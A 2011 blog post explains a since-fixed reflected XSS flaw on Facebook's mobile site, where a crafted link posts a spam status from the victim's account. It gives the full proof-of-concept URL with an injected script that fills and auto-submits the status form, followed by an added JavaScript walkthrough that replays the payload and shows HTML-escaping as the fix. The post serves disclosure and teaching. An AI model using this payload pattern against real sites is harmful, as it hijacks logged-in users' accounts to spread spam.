Tuesday, March 29, 2011

New XSS at m.facebook.com

So, I noticed that someone found a new XSS vulnerability at Facebook. I figured it out after seeing my friend update his Facebook status in Indonesian.


So, what the attacker can do is this: when a victim clicks the link, the victim's Facebook status is automatically updated via... Facebook's own app! You can see in the screenshot that the status was updated via Share.

PoC of the XSS


So, how does the attacker get the victim to update their status just by clicking the link?

http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx='%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value='Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E

The user_xxxx_xxxx parameter is reflected into the page without being escaped, so the <script> in the link runs as part of m.facebook.com. When the page loads, the injected code fills the message field of the first form on the page (the status-update form) with the attacker's text and submits it. Because the victim is logged in, the browser sends their own session cookie with that request, and the status is posted from their account exactly as if they had pressed Share.
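To make the mechanism concrete, here is an added example (my own code, not from the original post and not Facebook's code). It pulls the injected parameter out of the PoC link, replays the injected script against a fake window/document to show what it does to the victim's status form, and contrasts an unescaped reflection of the parameter with an HTML-escaped one. The page template, the form layout and the idea that the parameter is echoed into a notice line are assumptions made for the demonstration; the path and parameter name are the post's placeholders, not real endpoints.

```javascript
// Added example: dissect the m.facebook.com PoC link and show why escaping
// the reflected parameter stops it. Not the original post's code.

// The PoC link quoted in the post (placeholder path and parameter name).
const POC_URL =
  "http://m.facebook.com/path/blalallaa.php?display=wap&user_xxxx_xxxx=" +
  "'%3Cscript%3Ewindow.onload=function(){document.forms[0].message.value=" +
  "'Update Status!!!%20http://fakelink.cc/something';document.forms[0].submit();}%3C/script%3E";

// Percent-decode one query parameter of a URL (null if absent).
function getParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Return the JavaScript between the first <script> and </script> in a
// reflected value, or null if there is none.
function extractInjectedScript(value) {
  const m = /<script>([\s\S]*?)<\/script>/i.exec(value);
  return m ? m[1] : null;
}

// Replay the injected script against a fake window/document so we can see
// what it does without a browser. Only run this on the known PoC payload.
function replayAgainstFakeDom(script) {
  const form = {
    message: { value: '' },
    submitted: false,
    submit() { this.submitted = true; },
  };
  const fakeDocument = { forms: [form] };
  const fakeWindow = {};
  // The injected code only touches `window` and `document`, so passing the
  // fakes under those parameter names is enough to capture its effect.
  new Function('window', 'document', script)(fakeWindow, fakeDocument);
  // The payload registers an onload handler; a real browser fires it once
  // the status form exists in the page.
  if (typeof fakeWindow.onload === 'function') fakeWindow.onload();
  return { message: form.message.value, submitted: form.submitted };
}

// HTML-escape for text and attribute contexts: the fix for this class of bug.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Assumed shape of the mobile page: a notice line that echoes the parameter,
// followed by the status-update form. The vulnerable version echoes it raw.
function renderPage(param, escape) {
  const shown = escape ? escapeHtml(param) : param;
  return `<p>user_xxxx_xxxx=${shown}</p>` +
    `<form method="post" action="/status.php">` +
    `<textarea name="message"></textarea>` +
    `<input type="submit" value="Share"></form>`;
}
const renderVulnerable = (param) => renderPage(param, false);
const renderSafe = (param) => renderPage(param, true);

// True if the markup contains a live <script> element.
function hasScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

if (typeof require !== 'undefined' && require.main === module) {
  const payload = getParam(POC_URL, 'user_xxxx_xxxx');
  const script = extractInjectedScript(payload);
  console.log('injected script:', script);
  console.log('effect on the victim:', replayAgainstFakeDom(script));
  console.log('raw reflection executes:', hasScriptTag(renderVulnerable(payload)));
  console.log('escaped reflection executes:', hasScriptTag(renderSafe(payload)));
}
```

Run it with node and the replay shows the message field being set to the attacker's text and the form being submitted, with no input from the victim. The escaped render turns the payload into inert text (`&lt;script&gt;...`), which is the whole fix: the parameter is still echoed, it just can no longer become markup.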

p/s
- If you want to click the link without updating your Facebook status, log out first :D
- Expand the shortened URL into the real URL first so you can see where it points.
- Still, never click it. An attacker could swap in a more dangerous script and do something worse.
- Just remove the status update before your friends click it. Please don't share it for fun; it can be dangerous for your Facebook account if the attacker wants it to be.

edited:
- The Facebook team has already fixed this vuln.
- My friend also blogged about this. here
disclaimer: I'm not the one who found this vuln first. Kudos to the real finder.
1 comment:

Anonymous said...

nice post! =)